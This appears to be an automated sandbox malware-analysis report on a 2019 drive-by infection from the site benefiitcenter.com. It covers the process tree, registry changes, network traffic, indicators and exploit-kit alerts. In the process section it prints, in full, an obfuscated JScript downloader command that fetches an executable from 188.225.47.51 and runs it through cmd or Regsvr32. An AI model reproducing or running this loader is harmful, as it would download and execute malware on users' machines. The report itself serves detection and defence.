URL: http://benefiitcenter.com
Full analysis: https://app.any.run/tasks/10550bb5-6615-4597-968e-a1bcdac11293
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 14:38:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: adware, trojan
Indicators:
MD5: A445B823BCA2406AF67BE8B5D21FA8D5
SHA1: DE16BF7ED6A77BF8C4616531A881E9FC43AC36E0
SHA256: 3FE100AE07714D46FB8BA6E0D0C69AC4101427D7DBBAFFFDD111C5760B2320C7
SSDEEP: 3:N1KcusbmbGKI:CcXKK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Connects to CnC server
      • iexplore.exe (PID: 3244)
    • Starts CMD.EXE for commands execution
      • iexplore.exe (PID: 3244)
    • Application was dropped or rewritten from another process
      • radAD877.tmp.exe (PID: 3096)
      • radAD877.tmp.exe (PID: 2252)
      • radAD877.tmp.exe (PID: 2384)
      • radAD877.tmp.exe (PID: 3860)
  • SUSPICIOUS
    • Executes scripts
      • CMd.exe (PID: 3704)
    • Executable content was dropped or overwritten
      • wscript.exe (PID: 2932)
      • radAD877.tmp.exe (PID: 2384)
    • Starts CMD.EXE for commands execution
      • wscript.exe (PID: 2932)
    • Uses WMIC.EXE to create a new process
      • radAD877.tmp.exe (PID: 2252)
    • Executed via WMI
      • radAD877.tmp.exe (PID: 3860)
    • Application launched itself
      • radAD877.tmp.exe (PID: 3096)
      • radAD877.tmp.exe (PID: 3860)
  • INFO
    • Changes internet zones settings
      • iexplore.exe (PID: 1516)
    • Reads Internet Cache Settings
      • iexplore.exe (PID: 3244)
    • Creates files in the user directory
      • iexplore.exe (PID: 3244)
    • Application was crashed
      • iexplore.exe (PID: 3244)
    • Reads internet explorer settings
      • iexplore.exe (PID: 3244)
    • Application launched itself
      • iexplore.exe (PID: 1516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 53
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 3

Behavior graph

Processes in the graph ("no specs" is the report's own marker for nodes without displayed details): start, iexplore.exe, iexplore.exe, cmd.exe (no specs), wscript.exe, cmd.exe (no specs), radad877.tmp.exe (no specs), radad877.tmp.exe (no specs), wmic.exe, radad877.tmp.exe (no specs), radad877.tmp.exe

Process information

PID: 1516
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" "http://benefiitcenter.com"
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3244
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1516 CREDAT:71937
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Internet Explorer
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 3704
CMD: CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[""+"WScr"+"ipt"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t "LugZ8DoD" "http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2" "¤"
Path: C:\Windows\system32\CMd.exe
Parent process: iexplore.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2932
CMD: wsCripT //B //E:JScript n.t "LugZ8DoD" "http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2" "¤"
Path: C:\Windows\system32\wscript.exe
Parent process: CMd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 496
CMD: "C:\Windows\System32\cmd.exe" /c radAD877.tmp.exe
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3096
CMD: radAD877.tmp.exe
Path: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Parent process: cmd.exe
User: admin
Integrity Level: LOW
Exit code: 0

PID: 2252
CMD: radAD877.tmp.exe
Path: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Parent process: radAD877.tmp.exe
User: admin
Integrity Level: LOW
Exit code: 0

PID: 1268
CMD: "C:\Windows\System32\wbem\WMIC.exe" process call create "C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe"
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: radAD877.tmp.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: WMI Commandline Utility
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3860
CMD: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Path: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Parent process: wmiprvse.exe
User: admin
Integrity Level: HIGH
Exit code: 0

PID: 2384
CMD: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Path: C:\Users\admin\AppData\Local\Temp\Low\radAD877.tmp.exe
Parent process: radAD877.tmp.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Total events: 609
Read events: 528
Write events: 79
Delete events: 2

Modification events

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation: write
Name: CompatibilityFlags
Value: 0

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 1

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation: write
Name: SecuritySafe
Value: 1

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write
Name: ProxyEnable
Value: 0

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation: write
Name: SavedLegacySettings
Value: (binary value not shown in this extract)

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation: write
Name: {42F4DA3B-EE90-11E9-AB41-5254004A04AF}
Value: 0

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation: write
Name: Type
Value: 4

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation: write
Name: Count
Value: 2

PID 1516, iexplore.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation: write
Name: Time
Value: E3070A0001000E000E00260013002400
Executable files: 2
Suspicious files: 0
Text files: 12
Unknown types: 5

Dropped files

PID 1516, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5: (not shown)  SHA256: (not shown)

PID 1516, iexplore.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\benefiitcenter_com[1].txt
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\52bb03c0-ee90-11e9-946d-128484243d82[1].txt
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\52bb03c0-ee90-11e9-946d-128484243d82[1].htm
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\zcredirect[1].txt
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@atztds15[1].txt
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\D5SIV9K6\188_225_47_51[1].txt
MD5: (not shown)  SHA256: (not shown)

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WT93FFVT\benefiitcenter_com[1].htm
Type: html
MD5: C99176AF5D7F35F01A99865C7D8B5AB4
SHA256: 5D4FCF1193E4D29A24F09FB9C35F4DD3B22CDF99E91847956A429E8A9A9D09E0

PID 3244, iexplore.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@benefiitcenter[1].txt
Type: text
MD5: A1AE190099C00D37BA9EE018C6148417
SHA256: F616CAE3B87FD2A8DA7A272B79DBE2DAF87625BCD5A5B91801A0BE73E4225251
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 9
TCP/UDP connections: 11
DNS requests: 8
Threats: 0

HTTP requests

PID 3244, iexplore.exe: GET, HTTP 302, 94.130.90.228:80, CN DE, reputation: suspicious
  URL: http://atztds15.com/wef9qwh344iq23r

PID 3244, iexplore.exe: GET, HTTP 200, 200.63.47.3:80, CN PA, type html, 474 b, reputation: malicious
  URL: http://benefiitcenter.com/

PID 3244, iexplore.exe: GET, HTTP 200, 52.207.141.11:80, CN US, type html, 1010 b, reputation: malicious
  URL: http://usd.odysseus-nua.com/zcvisitor/52bb03c0-ee90-11e9-946d-128484243d82?campaignid=2828df60-6c0e-11e9-87d5-12077332b422

PID 3244, iexplore.exe: GET, HTTP 200, 52.207.141.11:80, CN US, type html, 228 b, reputation: malicious
  URL: http://usd.odysseus-nua.com/zcredirect?visitid=52bb03c0-ee90-11e9-946d-128484243d82&type=js&browserWidth=1276&browserHeight=560&iframeDetected=false

PID 1516, iexplore.exe: GET, HTTP 200, 188.225.47.51:80, CN RU, reputation: suspicious
  URL: http://188.225.47.51/favicon.ico

PID 1516, iexplore.exe: GET, HTTP 200, 204.79.197.200:80, CN US, type image, 237 b, reputation: whitelisted
  URL: http://www.bing.com/favicon.ico

PID 3244, iexplore.exe: GET, HTTP 302, 200.63.47.3:80, CN PA, type text, 11 b, reputation: malicious
  URL: http://benefiitcenter.com/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTU3MTA3MTA5OSwiaWF0IjoxNTcxMDYzODk5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIybjZva2lvMjVpY2htNGxzdTQwY3YxZzIiLCJuYmYiOjE1NzEwNjM4OTksInRzIjoxNTcxMDYzODk5Nzg1NzgxfQ.JQvDVaJLkSjx9bTV1PbuCBN_xH_LGWhMo52r-oB9zVA&sid=4429c74c-ee90-11e9-8de1-6fc178c1ae1e

PID 3244, iexplore.exe: GET, HTTP 200, 188.225.47.51:80, CN RU, type html, 37.3 Kb, reputation: suspicious
  URL: http://188.225.47.51/?MzM1OTcz&kmtV&GwbMgL=mustard&QWFIL=community&jcQxipNBg=consignment&ffd3dfdfs=wXjQMvXcJwDQAobGMvrESLtDNknQA0KK2If2_dqyEoH9cmnihNzUSkr76B2aC&IBriYPCOL=callous&spPEressy=abettor&qsRWhB=callous&eceNhWsRo=neighboring&HSXhszw=mustard&t4gdfdff4=m2EofoofuZSaQbmhUWDelFizYhbBA4Qpfiu30iEnxDPhJ-D-hOLUTp1u9CdUbI&clsGOKl=electrical&CboBkqr=disagree&zACp=electrical&tymSOiWRm=disagree&sDiKMgzMjA2NTU1

PID 2932, wscript.exe: GET, HTTP 200, 188.225.47.51:80, CN RU, type binary, 214 Kb, reputation: suspicious
  URL: http://188.225.47.51/?NzkwNjU=&MVwZswJ&t4gdfdff4=ZYAVJH9aH6i0nSyRCfgZ_W_h3cZwwTq5uWRrlq2FSknrlCdsJ0wx6K6GlWyu0tVl0Y4gMSnajDE6f58EYwV0UC&jqzvyZIL=accelerator&ZLVD=difference&JMaPTzRbG=community&XiJo=neighboring&FmGHHv=disagree&ISxWZHWL=accelerator&wpaf=callous&chgYSK=mustard&gcvOZgO=consignment&WffEAL=abettor&mhznnFEL=disagree&ffd3dfdfs=xHfQMrjYbRjFFYvfKPLEUKJEMUfWA0CKwYaZhabVF5mxFDHGpbT1FxTspVSdCFqEmvVvdLUHIwSh1UzASw00yI&cSeBRNm=mustard&xyYNTk4MjU2

Connections

PID 1516, iexplore.exe: 204.79.197.200:80, domain www.bing.com, ASN Microsoft Corporation, CN US, reputation: whitelisted
PID 3244, iexplore.exe: 188.225.47.51:80, domain (none shown), ASN TimeWeb Ltd., CN RU, reputation: suspicious
PID 3244, iexplore.exe: 200.63.47.3:80, domain benefiitcenter.com, ASN Panamaserver.com, CN PA, reputation: malicious
PID 3244, iexplore.exe: 52.207.141.11:80, domain usd.odysseus-nua.com, ASN Amazon.com, Inc., CN US, reputation: malicious
PID 1516, iexplore.exe: 52.207.141.11:80, domain usd.odysseus-nua.com, ASN Amazon.com, Inc., CN US, reputation: malicious
PID and process not shown: 94.130.90.228:80, domain atztds15.com, ASN Hetzner Online GmbH, CN DE, reputation: malicious
PID 3244, iexplore.exe: 85.114.146.93:443, domain btcseller.club, ASN myLoc managed IT AG, CN DE, reputation: malicious
PID 2932, wscript.exe: 188.225.47.51:80, domain (none shown), ASN TimeWeb Ltd., CN RU, reputation: suspicious
PID 1516, iexplore.exe: 188.225.47.51:80, domain (none shown), ASN TimeWeb Ltd., CN RU, reputation: suspicious

DNS requests

benefiitcenter.com (reputation: malicious)
  • 200.63.47.3
www.bing.com (reputation: whitelisted)
  • 204.79.197.200
  • 13.107.21.200
dns.msftncsi.com (reputation: shared)
  • 131.107.255.255
usd.odysseus-nua.com (reputation: unknown)
  • 52.207.141.11
  • 52.202.53.245
  • 34.230.160.215
  • 52.207.32.96
  • 35.168.147.213
  • 3.229.163.120
  • 3.226.8.132
  • 35.175.38.64
btcseller.club (reputation: whitelisted)
  • 85.114.146.93
atztds15.com (reputation: suspicious)
  • 94.130.90.228

Threats

PID 3244, iexplore.exe
Class: Misc activity
Message: ADWARE [PTsecurity] Redirecting.Zemot (RBN ZeroPark 0-Click)

PID 3244, iexplore.exe
Class: A Network Trojan was detected
Message: ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2

PID 3244, iexplore.exe
Class: A Network Trojan was detected
Message: ET CURRENT_EVENTS SunDown EK RIP Landing M1 B642

PID 3244, iexplore.exe
Class: A Network Trojan was detected
Message: ET CURRENT_EVENTS SunDown EK RIP Landing M1 B643

PID 2932, wscript.exe
Class: A Network Trojan was detected
Message: ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017
1 ETPRO signatures available at the full report
No debug info